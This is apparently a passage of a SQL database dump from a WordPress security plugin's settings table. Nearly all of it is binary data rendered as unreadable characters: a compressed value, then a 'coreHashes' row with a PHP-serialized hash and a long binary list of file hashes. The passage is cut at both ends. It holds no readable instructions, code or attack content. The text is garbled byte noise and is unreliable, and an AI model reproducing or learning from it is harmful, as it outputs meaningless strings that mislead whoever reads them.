*;¦´tRZíŽVZí¦´ñ‡(mÎš+íN*íc•vüE¥}U†ò(#Nél-P:SÝ•.îT¥ËÊ¥k×/¥»Å\r¥»½\\é¸©ôrØ¦ôBžPúl\\­<$Vž~}Ry¦¹Mé\'½ <+¿©pWÔ…*°©Ê`§zå9Ótåù¦Ê‹\rÞÊ°˜÷ÊËAG•W[_(#ç×+£\no)£KÖ)ofÞSÆå—(o™T*“\r”Éõo•)KÊÔ+…Êô5šÊtç)åÝy®2ëê²2§1[™ÃmVæemRæwø*ß¤(‹ú•ìó•Z¿)KWù(KÙ}ÊšÛ\'”5,oåÃovÊÚ•|eí‡²NT>ªÝ©|’{Mù´è ²!¼WÙHR>·8¯|~­Gù\"gVùž¦|µ6Uùú¬Ÿ²åà€²åî²²µÇ_ùÞæ­ò}T£²­ÍOÙnÐ­l¯ëWv¡R”Ý‰iÊ¾È«ÊeBƒr Ÿ§?¬ôTŸUYQƒ\Z”#¦”#Øpå-_ù%ú™r\"õ›òk€ƒr2‚ªœD~UNãÓ”Óluåì†WÊk®)ôÎ)3µ”s”m»”€-.J\0õ‰¸ÚJ	¶ø«„œWBnø)aÌKJ8è®ñÐU‰Ü¥P\"[•(£JŒãq%¡ì•’$\nP’m¾*)&ë•Ô%ó°\\Éœ¸¡äëu*ù‰h¥À¶C)âá”OÎÃXrÙ!bqÕÿ\Z Ïx >€ãECƒ+‰r‰Ji©4.¥¬8\\CK\"B	—”ºÒNéII‘H„ÐÀ¥T$\r¡%‘PŠT$RtÒ¥ÿzîÕïí÷ó³ËÑ Pzºén‚ng@·(%è™³z…×Cïó§ ÏQeè»£”­ª@Ùë(¨«ƒêæhP-/æ¤Ë yôüÚgüšZ³“`È|Wò³´•ÌA;¤èö¬=]Ð›©zôû,ý~ñ _R\rú•`ñFª]„Q}rÁp`<¹=£Û¹`ôc$LÐ5€i%\'aú—50cš\'˜NÑÓyf`úæ1Xtë÷À:eXŸ÷\0­°±]¶Áöðy°ûmØ-=vÿ»á`ŸköÅå0¿e,P+Gõ‘°ø»,}4\n–íô…å®nàœu\\ÏåÃ*Ãeàn1Ü_<‚Õï¯çðRý^“`íö³°öÕtðY±|Þ€ßñdð;iþC€}¬ègÂF}?Ø=6–ªÂ&Ý°Ùq:lÞU›ÏDÂ6u‚ NmØ9ôì>é»ÂÞqýaot*x¸B D\'BÜo@Hãøßô*84JÂL…°œ÷pì‚Dýg?9eD;ÇAÌ_eS}bÿ,‚Ø½…ç \rqëVB¼ÓEˆwU‡çï8b$N2‡$µHÚRggŽ‚”P#87k=œŸ}.øêAz×\\H_<2Îl„Kw‡Ì2o¸¼~\\ù–\nWÕ•áêšçpÍ°nV™@ÞæTÈ;·úÂíÌp¸3´7ÜId¸Óþòc.À=}¸ç¿\nŽæBQX)<ðM†G\njP|ù<<q_¥¡Ìø=”yöƒ²TCx¶\'\Zž;~…çIï bÉp¨\\«\0UGWÁË_Á+\'x}ÑêFë@Q&¼ÓúïŠ´ á‰4jÄB£óh¼ù_‹@ó¬åð©p´ìÿ­Ÿ2¡M2|w¾ƒ:[ÃO•wðsµü|z 3èÑ*`vìâ²»ÖšaOY†JÁ\n¨tB\r{·.À>NÞ¨|É\ZU~tà/;Î¢êå8`¬\'üþÕ/ÌAÝ¨q!vùŽš›’Q{P#›7õ÷W£ÁŠ«hpëŽêöGeþ†ó£qô í8Æ¬ÇØtG£KGÐèJ>ŽkUÄ	/\"pb®\Z/î‡“VtÅ)½ÝÐ$ÌMš£I‰6Nµ±ÆiW4púh\rœñûQ4µ[†¦áƒÑ,`ÎQªÇ9CßàœšWh~äZ\\ú-²ÑÒÿ)Z^|‚–izh­2­íÑFû2Ú*œC;·l´/:Ž†ßpK9.ñû\r—„Uâ²!ûÐiÉ=tz:WæMD—wQè\Zú=\\Ž GÜïè‘8=ßCÏ/ÑKw5z­rB¯ÀV\\Ó7×L\nÃ5¢÷?{ÐgøôM«Cßœzô­ßƒ~çñÏI·1@µ?nL²Á@Å+¸9ún±x‚[½bq«_wò°ÁíËpÇ5{Üåo{öÄáÞm^¸ïí4¶4ÅýÁ_p?´ã3—ðÀ›Õx0ý\Zr…‡6õÄÐà%x8¦ìªÃ£ñ®Nv•‰Ñq›0æ[Æöš±ºŽw¢\nã}ÔðŒ²#žyñ&<ÖÆ$C˜”œÉšã0¥©?ž`„é=1cý[Ìøú/5áeW+Ì²ŠYSðzK=fç`NbÞè²oì†7ÿ{›÷ÝoM™Š·?Ç»5˜ï±ïeìÆ{×ý±Àe%j,ÁBÿXd\\‹÷íñþÑ\n|¡‚ÅŸšðI?G,Ý\\eÏ»ã³„h|ö¶	Ÿß\rÄ\n¿`¬Ü5+k¯cÕ¸]øÒ¿_VÁê”X]½\rk<W`­âI¬½‚o¾b]¦¾5ž‰?N½‹3µðãóØžŽÍßn`Ky~VÙŒŸÉ\r¿¼êÀ¯FIØ~d¶w~HÃóúàØù3\0á—t$«{È“£IÑ4œ?¿¦n.ÍÔ}Àrê‘\\E=í3Iiügê5Ë”z¿¿B}Ü:H9/TöÅP¿Ÿi@ŸÑ¤œMƒÒ qÇiÐõrÒ\\[BšÇ’æ­ú5ü\"i]J!íá“H{Yéœ‰§a]7Ð°­wIož	é=n&ƒ«dèÜL†!/È°v>\r¿LÆªÈøë%š4ã0M*J¢)š\'iÊ¢d¢^J&ÿ$ÒÔãhÚ{4­|+M7/ ™ž¦dº¦æºšÑÜ…dnéLH\r&d9Íæ¥“mÜEú}S9¨,%‡³6ôGÈš•Bó¿‡ÒüB§í¤E»ÈñF9–Ï¥Å%\Z´ts-M;LËœÃÉyw­ts U«¯’û\\Zí@ÕŽä¹eyÅ‡×eZgN>ášä›¹—|ïO%?¯0ú³¡ü5•Èß;”6XÓæPÚ–@»Æí¢}Ó‚hŸßÚ‡(¸ ?˜èKÖ|¢õïéàXc:¤¤M‡¼\'P¨5…–ÙÐá2:žÑH‘3/PTk\\	tjÅdŠ­+¢Ó7Ë(ná1JP$JPk¡„E”¨ó”’lÍ(éºí­Bg‡­§³>”ò¿J-¦Ô†:?£’Òbœ)íQ¥5éSÆ1oú{A]ŠJ Ëç<(kv\"]u¿@×^ÓõŒ Ê6LÙv~”“ãB9¹çèFÊGÊ|…r¿ÿ¤[]ÌéÖÏ2Êò‚ò74PþöÅTÔäDz™ÓÃ…:ôèÌ*þöJÞ]¦§£OR©g_*\r2§Òs*Ó\ZHeëÞP¹²-•ÿÞF•Çs¨ª‹=U;¢êü2ªuéIµGÒ»ÕôîL ½·ï¤÷?fPÃ”ú(-Ô¿‡šo†Rsó~úÔòµhí¦–KmôùÅKj_º‚Ú«¨£Ou¸UÐ÷Ôëôs@ý\\Ù‹ÄÊ†„Æp—ÍÌ];-X!²‘rSYq¢÷?–•Î¦r¯=VÎög•§UÜÏ.‰û½yÉª]G°êSVmVäuXm~\'«eÞäA}‡òà¦<¸Ñ™µæùòÐJÖYpƒu÷M`ÝÎ<ÌÚ„‡eO`½¹ÏÙ`ô56ÈëÍ#V­æa<âx	ø¤Á#\r×ñÈÆé<º[½lÏãÌ–ñxã¾<a–:Oÿ„\'ºÚ°±ïdž<Ã\'‡íä)Î3Ù¤L‡§ž^Ì3—&³i~ÏŽW`³ªM<Çí[&Ýb+å,žçp‹íÇ{²½ï^0¶œZGòâ;5¼ôt/_WÀËƒ?óŠ²\rìRmÅ®ó&ðª_ÙÍ«‰ÝN]e÷Óyu-ìqÙ=¯®c¯±±¼&Bx­e(¯½¶×Õ²·§&{\'ñº?ö™bÊ¾™£ÙO÷oPÿ‡f.â@-\\~€ƒŠ¬9¨]wm±äÝ£ðç¼¯Q•ƒ·˜qð8~µƒCŒ¢8tq9‡Þ©äÃO{pØštË¨æ°6|´s&»Ù•g#Gä_áˆ¯8Ò¹‘#ëð	c\r>¹Q£S?sLèO>Õx‹Oý[Ã±Š9V«†OoãÓâÌñ+ïpüÝ•œà“ÄIƒù¬ÞNÞèÍÉMyœü§(ás³¾óyýÁ|q®§¯häô}…œ¡®ÆÃ”ùï‰‡8«þ&_¨äœöf¾ñk-çªÕð­ò£|{ÈN¾Ñ“ï®Æw}þæ|ï|ïø..(ÚÌ…;êù¡\"òÃ¼(~Ø–ÎÛºó“ÝÕü\"ùépu.7Iáç¥E\\ñÐ+^çs¥ßa~i;ž«ûÀ¯nüà×#fòë†g\\ÓÅƒk5–s­åN~SØ…ßü;ënöáº;ƒùmã®ŸìÎõÛ>rýµHn¨|ÌCÇp“á}þ4@…?­«åÖ¿¶ò×Ü%üMÏŽ¿Y~ä§…ó±^Œg3÷béÚ¯QòPç‰Ò6]Q>Q\'ý]¾ˆêjQ«}!êeWdðèå¢5!Q†ä„‹v€¿hÇgŠö}O\Z8Wt\"~XOÑ)ÎÝŽ2ì¤±èï*ÃÇ4‹þ $Ñ?³Cú_ƒ¯ûÄ€úË(íE‡ÄÐÂHÆ<8(c*AÆ™dÊDj•IË£dJ¢ºLm6—ÛÞŠé5±ÈV«Q±buJSlUŠÅ6Ä¶¦‡ØÖ¾ÛwŠ]òT±ŸÚ)ó[ÌdAâHYxÚU‚£8Î*”%æÊ²ÔŒeiL”8¹«ŠÓ«4Y5t¤¬ÚT#«;‹WIŠ¬õñïáÉºæñ)	_+KY?{Œø÷W¿4Lä¯àÙº3M¶(JçzÙi¥(;ó‹%ØÓXö\'»Jˆz›LÒ’ƒÿv“Ð˜>rx‡„\rkˆx+‰´è.‘W‚ä„ÆZ9ñ£‹D5õ–˜Î?äTâP‰ÝX-	+NHâ‘‹’XV()k^KJ`„¤ìé\'©cý%uFœS“ói#$Ó­H²„I–ËsÉªØ\"Yµ%rõÓ¹6\'A²\"$\'*Rrí­%×©@òÞºÉœRÉ?T$ù¡îR01J\n\'Î“BUyV*u\näq“<þÞEŠwIqM ·¶HIÎgy:ÐJžÎ<$¥cÊ¤´­@ÊŽIù~y¾þ‹Tx{HÅ¶¹RY Uwäe[­¼ú­BjÞšKMÛZ©=~Bê‚×É;…ÙòNËEÞMÈ“ú9(\rý{KÃÛÒÐž%.½¥i¸‹|2Ú -“µäËÙfùR‘+­»Hë_i½>G¾fÍ“¯gåk{|í¨•öíÊ·ÁQÒ1Ý]:¶™HGü\"é¨nÎûKäç\ZSùù Mð•¦Ð§$a‹­ÂÍ©Ãflÿ?ÉwZjÈ‘\0','no'),('coreHashes','‹\0\0\0\0\0\0\0€áa:2:{s:4:\"hash\";s:64:\"c952834be4b6b285bbaa704bdba58799eddea40687c079f66fbb89106e42dd24\";s:6:\"hashes\";s:116832:\"\0­ˆëW7‡Ž±ht#“	²šq¡»)¤ºdÅèú$\0ÐÉ\0(Ðœ˜úZúY÷Y˜@àIq©î›È—#áÑT»áù@\04ß—¼t‚\\v¦QçüÞ¹¾ô\'_ËáÂajxÊÒ¦Û\0E=j¶ƒËÈ‹|p8.æÂ½ÿ÷ËÖ¤ñóSGpåƒ\0Eq­x¿ƒ”ÃPa§ˆ÷>bváDª¿o4VŠG;a<±Þ\0^NÙå¼˜aðe|K ·-àÆÜ°ÒÍÉœ=ç„\0bœ&Fžö˜³ÿ%|w›í*Qr;|/Š=(A§óä<ü\0…‘¥#æBí5à¿j†ó$#õàj!ŸµþÐbN€ôjö\0Û§ÿå4(ÊK I|Š„¯0ºìµqD.^¾v¯\0µëiäÓÖ„\"ÞûãÆ]Ñ^è°þXDþ“2](\0¹‡ö/Œ¡o)öô:4]±ã_Çøß+Ì”ëŽc½þ×\0Ôeµ*ë@’t„À±\"éáƒq	ÈNþ’5÷„H¥\0íT|Ì…_¬ÕSò8­´O0Î¼ªÂ¸0ªÃª‰6•\0÷ù-bsèG¨\n(hr\Z.ónåõù!eÈ×z.YxÊ¦D¶IèXVªf¸EW£Ïe“€ßG§]¸ñ´q)6—í	ÅjÜí”õnNØ¤^}0[PœKXs“¤+È‰a±w©S‚¶à[óU`|WS³PDæ°ç¾ŸNh¬Èb!•Æò­#§8iß>kq6¿R„Eÿ5ž”:—\"ü…´Ï±„ç·Tª_^gyªzG‚L\"1°û³U}6:ŸŸl|‡ì(ãœ¦Á–q{ÆðVÀ~uê<¢Dh¦o*¿¯ŒcÏ¬0ßñÎÁx¢cl$‡	™4ÚÝm•·äÉøo¾¿`vA:§ø™ìˆ`{rfËÁï_ûS3/sÙmÚ?dš^Í”0ßX0ã#q–Â-mlÏ*€Ï$É2þäŽ]â’%Æì*œ6Þ\\þdpùÛ›!½s%Ÿà]Z×YÇoåŠÝ¿ŸþŸ¥„©‘ôÉr;GÐ÷\"Š¥Gu÷Éß&Ãw]ê-H€\rRWý½\\Ì5õ¦õò\'³Œ=ÃQ€7aiÌ\rICÒpE–KáÈÌð‡y½€kŠÑ©}Ë£œ\\$­p\"·&Ìp+^„ºÕ\Zõ{©¯ŽÛÌÂ˜¹5ÿ|™f¢ãµ…SÍLšo3EýxÀºýÑ¥Uãÿ°q¨`Žq4uí¶øZ¢®¹ð°¯[nù8”O£ìr7‡Í0H01YL$RRAhJ6´çM¦w:/ð7š.ÊÚP”Áƒh.BÂU-Ñ—ò\'TsÁªz+p¿ßMúË»yUL¤…ÁK«ùCËWaå\\°èËÄ\nƒ;è¥0åÄ \"f«ÐÎŸïÒ\'\rÍ¤ýDÄdMÅ×ÙùÃ÷§sËÇ¿‰ØÚ´ø$2ôj)Ã,\n²\' #6ä§9\nü‡ÏÚ–©õmKØ2†e²féte¾4ùœš\ZðGG.Àf­±Vy`¸Éÿ)\".o[`×ÏÝ\rÉn”óçjn¼viU\n@,›+!%u	re4Ù+JuP$,–WNÙPÙ2Ò\"Åž˜,|^âå€yÞ²ðñò/\Z(A°1]ü/Æ…­B‘Mój:­å@Ñ«ÈG+SÛf¶º«ÿ¹dVži‰\n°6W·úÔ‘\\<çOÌEj2¬QòŠ×Ö”\rÀ|þX6ÂìÔîÒ/46¤JòÕÉ?ÔÕæX’GX†~†–u™Ÿúic\râpª«õ´ûQÖÇí™œ½÷\r?c˜LÙTÓŠ•ùîqg¦È«?c—r‡È¸¦t­d®¬æB\rTJÂ,Q“Ó$šTDh×ñÐ((Zdz¶¹vOÿ¯¯Â_•Ÿ;Æ€›³EŒpYö.Õ&}öº_º	ÔQ¿Æ‰ãoSânnûÌµvêø\0)°öÌÓ¿–ÝÓ¤å:DILV­\0yÅZþˆ)›¾K‰\nã…ËÜ˜D‹~™‰%Roøïc‰Ö7®\r¦ºL»æ>1ŠÝˆ]š^]¬RÉ¢NF™MôâJÌ,˜ï÷iêI.2 š»>1·ZØ;×¨¾‚1Ô$š!¡‡W:	¨SxïDq5ºà/wºÛ_W:œØ+fð1zù¸g¢¦‹\\Yòúâmõx³GO0ÇÎâjo].ã–½®Bœ=½f~:N¾Ì¤Fa6¢Õ¡Ù\nY ØÓ\'ºèiûÂç+­`­ÂfGYbmŸïUP©™M™JéÚ¡0€&CvÂèM“$…Ûèú¶O½·4-K¸	o6Ûlbö1Eå;±7xù?ð-™Ç±Œ¨ZÞzE»Ÿ‰*†nk±»‰E×m@ìžãéöŽéð1s®­Y•#1$Ðé\Z£=I˜ˆŠ¿b£ŽXBr½?Š·ìÍ¥-ô‚!Çiº>¡`Éå]wBËùÎºõ@kp&»›¹h4Ô›µ2¶™ºm¦ÿI”$=„­ù¼¹D“‹Ö›&ÄÇ¾@+Õ¢ËÐz=¬i»êîÒ Sò¨°ÔÀý\Z\Z4Ú¶1é5ÁªÇ2’3\r#?EÉQ·ËØL¶ÕIm$ÏZÊåªB\Zï!„ãœ&šÍ–Ž—Ck†`7‹Ï×\'/¹½]äiª²5 \0¼ÒÖÎ%%Öì-ÓÕ)^\\‰¢\0«t`–kà²@§ƒ›UæOÅ”¤cp¦Ï>ã!8HB6¥Ïàãìâ=“bñÂ‰!§ônŠz\0§OS~Kêøç|$Øëö°T¡ìïÁ…ælJÆøbÿOwŸàÐáÍf\nTÀþ²­Eg\ZUê\røŸ£KN¢eéÓŒ»ð&ÂÐŽuÑ¡Iq™t¼·‹n~T	_j×-˜›†É%³¦?ž7¡0i–»Ë}ÍeÝiZÖO™&E+rXŽe{eª½mXÎÈö<¼:¦KSz_oeïÕýÅ­y§^/?h;@râK%àáLP…Çf¨àcË(|Õ_] ÛUÌÍ’o~MEÿèï×†Ý´sèƒò@Z2]¦óºi¾¨¨](J~nø3ìàÏ¿Ù€hjóqÚoÑ2±†kLý›JQ§c\0Ï8|VÜËA‘üýŠŽNÚº¶)\rÂmäMA¼ÌæD¾°os,–Õðê$»‹ôgJ	áÅ–Ø7l}Øa¡ñ¾ÔÈÁŠ¯Ãw|ÛgRLh!ö°1ÒRóþ&\'˜ýk±D\':8Yß¤\'\\Õ\0¨¶¯|Ç8Í(´ˆ]x’Zä´ÏvJ+è~†S‰$Ù‹6ÏîvgAÑœÀÊ‹Q?­j¬`J“ô‘2r)rk’+`½NiMçñ2]<¾	¾h\nÚË¥—þOí€3Œ5FžÐÈ\\Ì\0÷žð“,vSçç+p\ný.‡§™é´\rÄJ*RT	ü!ŒæA&–ÕUóBÍtG=_:\\ê]>iŸ£?Î·@Ú¹ÜaKÕºÚ*¿ Ô½+]²€µÒ®gÆ‰^62óG¦ž\rƒS …|±;)¥$=XÁn!Ãº®‚l=Ø@õAÍ°Óñ:ÞV56UÆþx5ôPx››Í&ó¿:V“VæûÚ-qX¹êA9ÀMç4Þà†-²°©t\n{ëÑõ†}ÿMI	AE0NãöÜÊûµ„Å.T0b([Î²Üžª£õíoYdÔÎ%Ü å+£[»Bº•ð f¶<3)|•žŸˆõ¾xZŸ Õq@Éõ¶ä51a¥Ixˆ»¼MOYÀUò\ržt1ð²#4çÍö´Ãä‚¹\Z€Á\'&Ý8Ñ\0Ãª”¿õ›m9;:áÄÍ¼„fÂÆf„)“™¤Iïœ³Í;ÁþPoiÃã§Ú=DáŽ¯ä¤0SlíhsgÜº{”,˜ó–ÕÉ`™€hˆÿ`“P¡*Í¤¹!j1m!–~J­Ž\r¦OÓ]ŽY<yŒ}ƒ\Z»>ÉºH¨¯ðI|ÜÇPôè±ßè®àBb¥½eÔ^üšÎˆ;VT1¨Îcj¨] k^§O×ê¤9«A9/Ø\ZóŒ%˜@b¤.Œ`»ð•š poÖÀïdf¹Æ?»jr£äYåe|ÕHŒ÷h>Ý,‹ecÞ¡–Rúes5-“šàD=ÇÄû<óÚ:3ãÍÏ©‘MçñÔ>»‹ÿrî6ËÔ¤Ðô%z‹uÛ‡7þ}»FËð˜Ä[yx±¯]káÆÝ­÷Yrƒ‡Ö¼9£IV,C2\"“•ÉVÑl·—pˆ]l2¢Pïøf>ìõKpÔÇÖšJ”¾™bvw°`î©ªµ*»wé ó}±Ëø©¶*Ê˜ñ˜)>2ƒq¤–e¥€^ÕÀ)ŒP’¦ÇnûGfRô@Ol,>ivÄ:°`ÄtQÆ*·8\'¥<“ó\nã‹Á’¼ Jò·;“H`÷QØ6pq¾ÿØaó%ë®ñ\r†Ø	üì\"…Anˆ3HØIsÌ:Y¥¤aÁe0BÒ²yõPp\nï­¾¯¨™òÆ!Î›Íÿ»Ù&°ÖÉ…\'MºÐ4ãšBŸSøßÉ+\'¥4&¼$Ø¡¡óVgg¤áoÎüg~Ùëm/à¡/&t+äùâs×ì¾äÔ\"#:Z«Ü¯4ã“‰&_&ÛÇÇ6\"xFð|w`AZ_+vL\r}°ŽNßPåÉæ6ƒ«¸Š½¢_ëðÒ°æÝ¾”ýl2¡bž©¹qÃœ$U„v¡ñ	l,s¨ÅÙ\"\rûmžè`»áY×“¯U”¶X^žMs÷—6RŸH@ñ	&‰å†¾¤BÇxžö@dÆR#U³ôOþPg›žsHüoè)nÕÎÿWréà@¯ˆÁüÜ*9V›»ŒÎ¼ó[E£¶Bu}<¨î„±\Z#¶d¸4*û?˜œå¸dªQ]Bx.|9Døö:h@ÖÂQÿÏ/U\0-|_Û¢1ùg-ñ+´­·Þ}üÔ˜!^iB³ÐòJüÕ\\W¤]f§œ@@…w£=	.]¶íkZ1Ñ™mÒGõ‚ý]Ôxà0øê•É	64µ®ˆç ¹2DMÈMâ$Ë\ræ¾i“\0Ô¬‹	8\\Å¬ç®jùA’Ê”5Ñ+X­œoˆTùm°_|	Më°ìyu$œ1¼ck_‘KÿoÝfÛÏm³…¹%û	g)[.‰r\nào”i×{4Š›Q\n\r8HŒ\rfXðÀè	v¶l»´õÙ®ß÷!ÿð¹ÿP€²mýø•\n6|Ï”K	~ÐõCèÈ«™¯7¤àÃ:À£s&uËäÙìjÔËt	©+ö{RôƒäÓÙ„åÔËnýt,´Çž¦`µ•Î|Uî–	­	½œ#t‰Ì¹»ê«p=¬I\"¼¦˜)F	Ö“ÅÜñ-Œ\nqU‰Ëiº×Í-›$àh*íØm™l	æVh˜ÐðLC‰Â»>UÆ8.Å`Æ@<Kéãh	üÍ¿¸ÊU%ÅO¨HÞ¡ñŸ…@¿~x\\6ÎÄ~â\n*„²<×÷ºÓ³³?HM²\'VÕéèLî¼\'[RÛ\nð@&Øê[DqSÞÁÊÓðìàB—×N#F‰B…ä\n*An•„¸.]éBéÄtúvƒ!‰WÒ§Mw’9ÝûF\n+P_tQÿVoêú©²ª7nÿ\nz#ù8ÍúºÒÛßJ\nv­?Ìuì	ÒÈÈfßh6Ú2Bþƒè?ñ2\03”}¦\nx‰çm¯«…nV=OD¼“\0T­ÚÞ)‰ÏUÜã©\n‹\\_9(ô)7‚\n—Ö/õSæà\'ägßƒ†v•£Ã\n¡9d£Çìgð~@–¤®|ëB-ŸÁ°²œÚý6=£\n¤TÂ[Cp¹±§â(,¬_V+äL\rÛ¨I¹ü(.ˆ„\n¥súH×µÑ‡c ë-y//ý?‡\r®$MÌ¤j3\n§aqYK´JÒ”Î€pù\ZJüj¯\\PÇ˜È\nÔ\n¶¯Ú·›tnŒ\r‰EanòŽJ;}(ïÒÒ™©ñÂ.°Ä9\nÁû ÅW\"íˆúëw†\05ÑS NrËý©Š¼šh\n×CãÙ0ÄpFdù°‡l•\0¿ž\"uê™~2\"õT¯½p\Z\nèvÉ[\0Çõ‡XZppiý.Ì¡c¹;~&Œ†Ýø\nî·Î&ª)h4Ð_`ÕFãL“<—ã:`#pf¢ìò\nù˜˜ÛRW#Þˆ´ å¦Q¥ÆÄ“4E[£\'Äz“61k‡K(£á]1Èz¯ukpR¶!¢‰³Œ—YCL{ÎçzÅ)ªú,­\"§wÍWÏýS²ŒJÇ²þžÕÁK­SÁª´Àuá¾’¹MˆÂccÖÍÞcdD™(‹Q±Ì\\™\raò•[„J?TÓÐð?ÑÿúG¼d¡æ(s†©ª¢Ôîtô¦BUI+u›˜ÀC¯ãÅ¶…R‘ŸãSF2>Â3`¥ûvÉþ\'˜:js(-Nê§²šÖ ¸ï–çNç3ƒì•ô:âVS;ÛÅáCT\n€»] þ¥C‡rJ¾2ŽªËÉm5CZ‡\0Ù/@@1ß1ÝÆSîð.>õU‘B|2›üÓœOU}¿Ú(Ô°¡tcç2Á¬Ä’ZV†Rêé¡ƒ[§‚l#4ÿË»>1Îµ¢´Eþ€Âl|lh¬®£ÙÊ]ýŒä:ÔYÅˆõ3	š§Óì\\gmÌ»ñ1)q+#ã˜òÙbæ^0rR_Ò²¿ˆYn,ªJš©©½ÎÍ“TÈNBº(Ù-±§iDäøÃr‚è´È­!wz÷L{©ïJÑy7-Ñmé×á“Gé´žYâŠ[¨ÍôãkÊÈEn#XvÕi‡w÷R»:žM7K¬kRŠ¢D·•¬‘.„ó²© L9Œô%±S÷¨³J*˜À–…n\'Íªt^ÀÎÐVÉ¹ÅO‡œÆÇì*ó(œ˜„·Š7Y‹î(VÝz|%\0\'j·Õ­lø÷Øµ®$hçTCîôßÕžNû8köÈºÉ™y¸mœ-Bî©Ëóì›ìYVAlÍ¼2¾VSü#nÛØòX¼–‹Õ6÷ÃXî”›âñDUÈTö=õ–1O¿@ø,xÔÏý’ˆÝ³Ù Ø)®¼\r&Üd5·s/,—\"ìd·\r1?–;IBœ=S±÷\Z“2ÍÖ¥‘&þ×†Z¤B®¬»\rQiü^š\ZB|­äf²‘C‘¿è-/r±ÞUÇYÙ¢ÅB\rX·[cdpSs3Ó%.Xóå|AˆºÄwü˜#(JL\ra‚{pë9ÑÙåó(A–)Ë¡…Ì®SPV†Ìsë6ì#i\rnuŠî:Ft\Z±¤\"P9ÿµ¸qP¾‰œR¸®PA \r‡¼Ëk•<vWàPäÀœvªãg(HÑ‚µ¢cŽ+d7\r”YÓøtÚW^¤ü¬}rIxÛ¯óºu†$ç/dMkØ\r Uÿò‡:ïwöçëÔ,ÈËß&çK…p&á\ZšÑ\rÂ›Ø×Xd	D\nè£ìñŽ¬q¼bc÷\Zu—íÀ\rÙ“£ÒC7,š¾<ÜúÜp­,ÏLùâµ~rYús#€\rç\"¾(qqš6çZN†è´Ïæ–Éû–ÕÅŸ&åh©Ï\rò\nÝîÌ*J–Ô6´¤©¾û”V^±Ï%W\\Ày¬\'íh?IÆÏIëÂ3z(BŸGQ#‰—`päS:eJÇ&„/–ÊáaÉ‹¨“`ï÷þ\nŒ}ûç\Z\\xÕ+ÃG\\%R£µÍO¢¤6³àûí}î°ã•“æ‚«Ä-ªFúkRVËð£6š·ƒG_e\r­¦\"ä}ÕQ^uâÕøÀ¿£YtY®‰sNlÉdU|ß7™‘tìUàFY€›ÈnˆaÔIWRHÛj°wHBBÇí•Îíu¤Xp\0bäUeÒ$OÁ11Êæ¨]ûQ[¯Ú7*ûa3ÞÇ¾Úh‰‰,¡UúŽªc\\ë¯kiš² »6uøàJ\n3*¬“KvÊi„åA&à4’ú«=‡DéÖq!è“¸Ö§f;4“™PäZµøeµO!˜vx.eèÓ8—jY¦»ûçß0\Z¢´€èP…P1¯ÔS/ÀÞ0?ëU!õÍˆ¾ß½¸õò6°??ÏÏöZž‘vˆw=2H:õ)x.°ô®‡³Éo\\ÅÔJ†Ât®LUËÕoíõßñ­L¶¿~ŸÐ)6ÓKÏ5S$Ê‚8—ÇÝ×â¡§5gg7ƒ3lsuØ¾«yˆÝà‹Z¢wÚ ›0YE\0éåÏ£èº«i\\ùÂÞ|’¼”˜Í7‰Ùwq‰Ò;,r’íäLXâü†±çÈ\\35qv.Rß¼h<<êï«‘t÷hDŠ$ŒÂ\\FâM…(ñb;ËôKáóæ«g«&\nõ-“ûnzEwèÿc@Û2Ží,éòÓù´¶P±0ëíÁºé¦Îãîx`ÕžˆÚdZvsþ.ÔÄk‹’º…Þ\Z¦5Å\0«ºyX“§$Èõjë¤‹ˆÖIˆÂö8¢ÏÌ@t=Þä{9vÔÆ>:Ì·M\ZÔÏµ‘”±¸\rBt\rðÏ×ÌÏ3û˜½å­±‚öš„tõC ÿY£\n™ÜHßú$$ŸTƒÌž}^ñpfO]ÅÇ­N3­%\r\\Šà-ØA¹J²KÝªK—àƒý7P¯xeæ\'£PHøÿåHýP=,¼L‹‹ëNÁ·}ïœ\ZøEåùO\\0¸uÅÊFOR\Z)Ä§è„;S \'bN<vÙwúLSÚ»«sT³Å|Ï>QëÎ°Ïi}ÚGåD…£Ž7á OF5ì¢B×NovÙßÈ:A_-3£ûx\ZJ¼B“@k‡y50é“ÏÉ\n­×Qã(çð¯;®4ôÁ.ó¸ò`R‡Åwÿ|lSÉPpÜkÔGÆMÑ8Çüƒ•¡ÝÔ¹ÍÜöfòEËx;Ë±£ÉOØ[À÷óÌJ`uOâv&_ÜÙÜ-]ª›ƒÆE–ç;|¯µx$ åí(˜t`\"òíð/\Z=á`>&î‡oRŠÖ«Ùúª	æÚ²îç}ÆZ	wé%þö(ð4)¶;\råí;¢)6qi9CôÜ2éÜtÖd64KÕ®ÚAØU)Û³! ž¡Pdlwä+´þ¯>Æ;ç ßO¬±-dÒG¢;žÏ·ð6Á<³á°òúº wj›;ÔV½Û4dkÏÔ·Ü>·D‰ŒjÃ,p„Æþk~*Šº®Ýd}ç¯[¼ÔíçHù?âiK¶[¼i¾ú/Û(õ¯‹â^ž\\‚Œö4¢žc-¡ÃÈœ¡þ)öÍ—ÊÛ·õ¢Ò@c.ìV_;qö¦ª:uMø­ÛX®ýœbW…ìZ`ïÄE²Ø¶\rÇSèñkyíì%„/þ-‘Žu_EC©?oÍTgûNLC\"Mï61É¿ä\\ˆ)®ji®÷êÁñ]ãm¥†bŠ#¯™«6ˆ§C2 —Îaoß2á¨FýÃäËLØW¡”®%\rVJ~øpŒí$¡Á–P(‹ñqŠÇú\0„RSé;\rsò}¼ºo%Š©XOwR	É\\˜óBÐ;zÜÀÒõùñb#Êqš¾l¦¼EôˆSŒWDò€æLexìÝéª´@m!Ñþ~¶î§Ñ|dûET9v,´WÑ‹‚‡ÜÊ€KKì˜Ñ#\0ªÊf›ç¾€PP¼\0A¢wƒ:oHðRRˆESÌG‰ÂÊT-ëa*Qf±,S»7ôÏqÔÌ“<¦U*\";b¾r’êÛ^°&Â7jùFÅ‘øú‡ÀÒ±yÐZA\"ÊYŒ!•	=¬šxö`Jß©i.¬?w~ë/\"w¾U{«’ÒLf×1:Õ¤y;¨&Û†Þ¹[rD«ÞbóNv•Œã¤„¢Õ\nÿ\Zwr‰ÄkHuE¤ììôNÁ/ïJY·’þgöSi÷–)”N]oòëÕ}ß0<Á,ÄíëeS</öÜ“8CÒ©T2I†UXÐjFê¾\rPJ6¬\\íd$Se=gÁ®˜øÛJÞ°S·0¼£il‰ww®4‹:™øÔÚ\"D½‹¥€=[•¸ZÌï\r‹‹ç#¦A@Èf3¨1_<ÈÑîv£ÏËü(QNÐÜYCwoéÍÀÛô}zïö/+xÙ±—®\Z8Õîû3¤•¯óóÛ€TÁÑ‘/ºÇ*¨2^ÂoÜ°ì\n­0üþ\0ÓÏ1îx?F(É8Ž¯ÜVíéÅÙ/`8ÜùÐ†ÀÂŒã×t¬2Ô:²]XK%×	EL­Øå„ŸíŽt